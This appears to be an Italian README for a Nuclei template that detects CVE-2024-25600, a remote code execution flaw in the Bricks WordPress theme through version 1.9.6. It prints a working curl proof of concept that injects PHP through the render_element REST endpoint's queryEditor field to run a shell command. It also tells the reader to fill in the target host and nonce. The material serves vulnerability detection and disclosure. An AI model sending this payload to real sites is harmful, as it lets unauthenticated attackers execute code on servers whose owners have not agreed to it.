
Template di Nuclei e informazioni sul POC per CVE-2024-25600
Modello Nuclei e informazioni sul POC per CVE-2024-25600
Il tema Bricks per WordPress è vulnerabile all'esecuzione remota di codice in tutte le versioni fino alla 1.9.6 inclusa. Ciò consente ad attaccanti non autenticati di eseguire codice sul server. Questo template 🛠️ è progettato per rilevare la vulnerabilità CVE-2024-25600 🕳️ presente nel plugin Bricks Builder per WordPress utilizzando nuclei. La vulnerabilità consente l'esecuzione remota di codice non autenticata sui siti web colpiti 💻.
Il POC completo (automatico) è disponibile su https://github.com/chocapikk/CVE-2024-25600.
Il PoC di base fornito dalla divulgazione è il seguente:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
Sostituisci [HOST] con il sito web target e [NONCE] con il valore nonce recuperato dal sito.
Per maggiori informazioni sulla vulnerabilità CVE-2024-25600, fai riferimento alla divulgazione dettagliata su Snicco.io.